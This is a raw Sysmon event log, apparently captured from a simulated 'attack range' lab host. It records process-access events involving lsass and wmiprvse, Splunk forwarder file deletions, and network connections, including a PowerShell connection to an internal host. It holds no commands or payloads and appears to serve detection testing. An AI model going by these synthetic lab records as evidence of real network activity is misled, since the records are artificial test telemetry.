18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.084{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.053{B81B27B7-4013-611D-1600-00000000C801}11964628C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.052{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035083542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.031{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.031{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D04-613A-1690-03000000C801}964C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:56.015{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:56.015{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:56.015{B81B27B7-4012-611D-0B00-00000000C801}6366276C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.991{B81B27B7-4013-611D-1600-00000000C801}11965212C:\Windows\system32\svchost.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:57.960{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.887{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:05:57.870{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4D05-613A-1890-03000000C801}5796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035083575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E954DB553FC1439E7CA9D386C644258,SHA256=6D9732EF198A760FEFB26431B12D4688388342177C7C57FC37D929076BC76576,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:20.726{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56492-false10.0.1.12-8089- 23542300x800000000000000035083573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.053{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBF117CFE4162F91D4E6F23847E13ED,SHA256=B9AA09CFE6C1905433A2638880248C654FE99D0486AA05DB7C1DE4D54FE72FDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:57.053{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87820FF7B473DAA04385B3D9D253E6EA,SHA256=0536C5B9F5CE9ACDDDB204FF8CA21A989ED3122DDEDD732C76451B78940C9E93,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:58.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BBF117CFE4162F91D4E6F23847E13ED,SHA256=B9AA09CFE6C1905433A2638880248C654FE99D0486AA05DB7C1DE4D54FE72FDA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:58.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D265AAE847CC30873F9EAF703E66DF74,SHA256=27583F956CC6AC6A2F81E383A6B2B7EB8D1770C404938CBFA664286B84893E6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:59.789{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BCDD2B246226476EC0FA0B029E5B232,SHA256=C001DA8E6AC637A7FC9BCEF6A10766E5AF62348E118D28BAAA03B0EFAC534A4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:00.819{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDD6B9E0F79717E9FA6D3CE0572983CB,SHA256=5253163D0AD0C2D918C3A792BBB9D8FE3CFBAEF821E2894D5D136101CC7179C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:01.852{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29EE5C0C27DD0EE49C89AC438474308,SHA256=25B6E1B944249CA6C3D80A08ECCE7B5A20A2DE33E8279F98CDBC460E247122DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:26.200{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56494-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035083585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:26.100{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56493-false10.0.1.12-8000- 23542300x800000000000000035083584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:01.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1F34E587B937C0244A28CEC0BCB0DD3A,SHA256=3039D3EB2D1EAE0379171FC206EDCCC7E6B5875FDE7D0FC5C058AB7120A72107,IMPHASH=00000000000000000000000000000000falsefalse - insufficient 